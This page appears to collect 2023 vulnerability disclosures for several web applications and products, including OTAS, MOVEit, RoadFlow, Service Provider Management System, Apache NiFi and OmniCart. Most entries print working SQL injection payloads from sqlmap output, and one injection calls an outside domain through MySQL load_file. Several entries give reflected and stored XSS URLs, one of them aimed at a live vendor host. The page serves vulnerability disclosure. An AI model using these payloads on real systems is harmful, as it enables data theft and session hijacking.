Online Thesis Archiving System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 06.12.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The password parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'was submitted in the password parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain. The application interacted with that domain, indicating thatthe injected SQL query was executed. The attacker can dump allinformation from thedatabase of this system, and then he can use it for dangerous andmalicious purposes!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')OR NOT 1404=1404-- Eotr    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:01:15:00

Online Thesis Archiving System 1.0 SQL Injection

This proof of concept abuses an SQL injection vulnerability in MOVEit to obtain a sysadmin API access token and then use that access to abuse a deserialization call to obtain remote code execution. This proof of concept needs to reach out to an Identity Provider endpoint which hosts proper RS256 certificates used to forge arbitrary user tokens - by default this POC uses horizon3ai's IDP endpoint hosted in AWS. By default, the exploit will write a file to C:\Windows\Temp\message.txt. Alternative payloads can be generated by using the ysoserial.net project.

MOVEit Transfer SQL Injection / Remote Code Execution

Prestashop winbizpayment <= 1.0.2 is vulnerable to Incorrect Access Control via modules/winbizpayment/downloads/download.php.

CVE-2023-30198: PrestaShop/Tools.php at 6c05518b807d014ee8edb811041e3de232520c28 · PrestaShop/PrestaShop

The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.

The resolution validates the Database URL and rejects H2 JDBC locations.

You are recommended to upgrade to version 1.22.0 or later which fixes this issue.




CVE-2023-34468: Apache NiFi Security Reports

A vulnerability, which was classified as critical, has been found in RoadFlow Visual Process Engine .NET Core Mvc 2.13.3. Affected by this issue is some unknown functionality of the file /Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 of the component Login. The manipulation of the argument sidx/sord leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Permalink

Cannot retrieve contributors at this time

1、Use the default account to log in normally  2、Click log query, use burpsuite to capture packets   3、package： POST /RoadFlowCore/Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab\_0B73635494734D66B9C015CAC149EB05 HTTP/1.1 Host: 127.0.0.1:5000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, _/_; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 116 Origin: http://127.0.0.1:5000 Connection: close Referer: http://127.0.0.1:5000/RoadFlowCore/Log/Index?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&rf\_appopenmodel=0&tabid=tab\_0B73635494734D66B9C015CAC149EB05 Cookie: rf\_login\_uniqueid=C9965CEC-493C-4433-8F81-84267ECAF9BD; rf\_core\_rootdir=; usermenutype=1; rf\_core\_theme=blue; roadflowcorepagesize=15; RoadFlowCore.Session=CfDJ8EvfmoetFvtFn34qbL0bhQi732bT78siA0k9IyuNV7izzD2HaiCszYysIMm3IHL9tKRQYFo3z2VcOb%2Ba7grHTmnatCG6w2h3Ve0ZUYoFBB%2Fnug6MXcNvN6CJrON40GKlvi5uELoiS8mWsxVTkmR1Bpe%2Fn2KtT%2FGnfrgDuJSlMd8T; .AspNetCore.Antiforgery.SqRQVSlQWbo=CfDJ8EvfmoetFvtFn34qbL0bhQiNLjtoCHp8DTQQSTvj4Wzi3rHnvueNRx4iL7I9mxKb1WgacCXdIFkCxyXh520nuIsS3\_NqXifucqHDrhneFPLFspDzv8GeNY-F9Sr7xbTcCfiEOUKwVDAgHp8tTx5DRJI Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

appid=0B736354-9473-4D66-B9C0-15CAC149EB05&\_search=false&nd=1686014077522&rows=20000&page=1&sidx=WriteTime&sord=desc

4、There is an error injection in the sidx parameter of this package, replace the value of sidx "extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281205948442%29%29%29"，Successfully broke the md5 value.  5、There is time injection in the sord parameter of this package, replace the value of sord with "desc%2C%28select%2Afrom%28select%2Bsleep%2810%29union%2F%2A%2A%2Fselect%2B1%29a%29"，Successfully delayed by 10 seconds.  6、Use the sqlmap tool to exploit.

CVE-2023-3208: vulhub/RoadFlow.md at master · yangxixx/vulhub

Sourcecodester Service Provider Management System v1.0 is vulnerable to SQL Injection via the ID parameter in /php-spms/?page=services/view&id=2

    # Exploit Title: Service Provider Management System v1.0 - SQL Injection
    # Date: 2023-05-23
    # Exploit Author: Ashik Kunjumon
    # Vendor Homepage: https://www.sourcecodester.com/users/lewa
    # Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
    # Version: 1.0
    # Tested on: Windows/Linux
    
    1. Description:
    
    Service Provider Management System v1.0 allows SQL Injection via ID
    parameter in /php-spms/?page=services/view&id=2
    Exploiting this issue could allow an attacker to compromise the
    application, access or modify data,
    or exploit the latest vulnerabilities in the underlying database.
    
    Endpoint: /php-spms/?page=services/view&id=2
    
    Vulnerable parameter: id (GET)
    
    2. Proof of Concept:
    ----------------------
    
    Step 1 - By visiting the url:
    http://localhost/php-spms/?page=services/view&id=2 just add single quote to
    verify the SQL Injection.
    Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"
    -p id --dbms=mysql
    
    SQLMap Response:
    ----------------------
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause (FLOOR)
        Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT
    COUNT(*),CONCAT(0x7178717171,(SELECT
    (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: page=services/view&id=1' AND (SELECT 1072 FROM
    (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

CVE-2023-34581: OffSec’s Exploit Database Archive

OmniCart version 3.4.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32794/ - Pixobit Solutions                  ││  Vendor   : OmniCart - https://omnicartshop.com/                                       ││  Software : OmniCart 3.4.0                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /GET parameter 'lang' is vulnerable to RXSShttps://website/?lang=ar&ms4sp"><script>alert(1)</script>ffj2=1Path: /index.php/searchGET parameter 'search' is vulnerable to RXSShttps://website/index.php/search?search=123&h45te"><script>alert(1)</script>khuqf=1[-] Done

OmniCart 3.4.0 Cross Site Scripting

LearnDesk version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/35390/                                      ││  Vendor   : wvidesk.com                                                                ││  Software : LearnDesk 1.0                                                              ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ebook-detailsGET parameter 'eBook' is vulnerable to RXSShttps://website/ebook-details?eBook=2-20230526090815bgijo"><script>alert(1)</script>nq0d9[-] Done

LearnDesk 1.0 Cross Site Scripting

BB Machine Forum version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/38745/                                      ││  Vendor   : webfuelcode                                                                ││  Software : BB Machine Forum 1.0                                                       ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /threadPOST parameter 'thread' is vulnerable to RXSS[+] Exploiting the Bug1. From Index Page Click on Create Post2. Fill any Subject3. Select Any Category  4. in Thread "Put Your XSS Payload" example v4kow<script>alert(1)</script>ebxnq5. Click on Submit6. XSS Fired7. Copy the link of your Post and send it to the Victim example: https://website/thread/Your-POST8. XSS Fired on Victim Browser[-] Done

BB Machine Forum 1.0 Cross Site Scripting

Expert X Jobs Portal And Resume Builder version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/36326/                                      ││  Vendor   : wvidesk.com                                                                ││  Software : Expert X Jobs Portal And Resume Builder 1.0                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /companiesGET parameter 'listed' is vulnerable to RXSShttp://expert.wvidesk.com/companies?listed=z2rqw--><script>alert(1)</script>p8lvhPath: /search-fieldGET parameter 'pos_ref' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=qfq5c"><script>alert(1)</script>xosrj Path: /search-fieldGET parameter 'frmPositionCountry' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=it&frmPositionCountry=qfq5c"><script>alert(1)</script>xosrj&page=0[-] Done

Tag

#sql